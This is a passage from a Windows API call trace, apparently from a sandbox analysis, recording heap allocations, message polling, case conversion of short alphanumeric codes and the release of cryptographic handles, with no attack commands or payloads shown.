wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.232] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.236] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0264.236] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.236] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0264.236] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.236] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.236] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.236] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.237] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.237] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.237] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.238] CryptDestroyKey (hKey=0xaa5960) returned 1 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.238] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.238] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.239] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.239] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.239] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.239] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.239] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.239] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.239] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.240] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.240] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.240] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.240] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.240] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.240] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.240] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.240] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.240] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.240] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.241] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.241] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.241] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.241] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.241] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.241] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.241] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.241] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.242] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.242] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.242] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.242] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.242] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.242] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.242] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.242] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.242] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.242] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.242] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.242] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.242] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.242] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.242] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.243] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.243] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.243] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.243] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.249] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.251] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.251] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.251] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.251] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.252] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.252] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.253] FreeLibrary (hLibModule=0x74d40000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.253] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.253] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.253] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, 